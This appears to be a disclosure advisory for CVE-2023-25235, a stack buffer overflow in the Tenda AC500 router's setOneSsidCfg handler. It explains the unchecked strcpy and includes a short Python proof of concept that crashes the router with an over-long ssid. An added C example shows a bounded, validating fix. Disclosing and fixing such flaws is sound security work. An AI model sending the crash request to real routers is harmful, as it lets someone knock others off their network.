CVE-2023-25235: Vluninfo_Repo/CNVDs/113_2 at main · Funcy33/Vluninfo_Repo
Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function formOneSsidCfgSet via parameter ssid.
Tenda Router AC500 Vulnerability
This vulnerability lies in the /goform/setOneSsidCfg page and affects the latest version of the Tenda Router AC500. (The latest version is AC500_V2.0.1.9(1307).)
Vulnerability Description
There is a stack-based buffer overflow vulnerability in function formOneSsidCfgSet.
In function formOneSsidCfgSet, the user-provided parameter ssid is read into src, and this variable is passed to strcpy without any length check, which can overflow the stack-based buffer.
So by requesting the page /goform/setOneSsidCfg with an over-long ssid value, an attacker can easily perform a Denial of Service attack.
POC
import requests

IP = "10.10.10.1"  # router's LAN address
url = f"http://{IP}/goform/setOneSsidCfg?"
url += "ssid=" + "s" * 100  # ssid value longer than the stack buffer
response = requests.get(url)
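The length check the advisory says is missing, as an added example rather than the Tenda firmware's own code: a model of the strcpy pattern next to a bounded handler that rejects the 100-byte ssid from the PoC. SSID_BUF_LEN, the function names and the 32-byte SSID limit (the 802.11 maximum) are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size for the model; the real firmware's size is unknown.
 * 802.11 SSIDs are at most 32 bytes, so the buffer holds that plus NUL. */
#define SSID_MAX_LEN 32
#define SSID_BUF_LEN (SSID_MAX_LEN + 1)

/* Returns 1 if an unbounded strcpy(dst, ssid) into a SSID_BUF_LEN buffer
 * would write past its end. Computed without performing the copy, so the
 * vulnerable pattern is reasoned about rather than executed. */
int strcpy_would_overflow(const char *ssid) {
    return strlen(ssid) + 1 > SSID_BUF_LEN;
}

/* Hardened handler: bounds the length scan, validates before copying and
 * fails closed. Returns 0 on success, -1 if ssid is NULL, empty or too long. */
int set_ssid_checked(const char *ssid, char dst[SSID_BUF_LEN]) {
    if (ssid == NULL) return -1;
    size_t n = 0;
    while (n < SSID_BUF_LEN && ssid[n] != '\0') n++;  /* never scans past the limit */
    if (n == 0 || n > SSID_MAX_LEN) return -1;        /* n == SSID_BUF_LEN: too long */
    memcpy(dst, ssid, n);
    dst[n] = '\0';
    return 0;
}

/* Reproduces the advisory's PoC value (100 copies of 's', constructed here)
 * and reports 1 if the hardened handler rejects it while the unbounded copy
 * would have overflowed, 0 otherwise. */
int poc_value_is_rejected(void) {
    char buf[SSID_BUF_LEN];
    char attack[101];
    memset(attack, 's', 100);
    attack[100] = '\0';
    return set_ssid_checked(attack, buf) == -1 && strcpy_would_overflow(attack);
}

int main(void) {
    char buf[SSID_BUF_LEN];
    printf("PoC ssid rejected by checked handler: %d\n", poc_value_is_rejected());
    printf("normal ssid accepted: %d -> %s\n", set_ssid_checked("HomeWiFi", buf), buf);
    return 0;
}
```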
Timeline
Acknowledgment
Credit to @Funcy_kilar from Guangzhou University.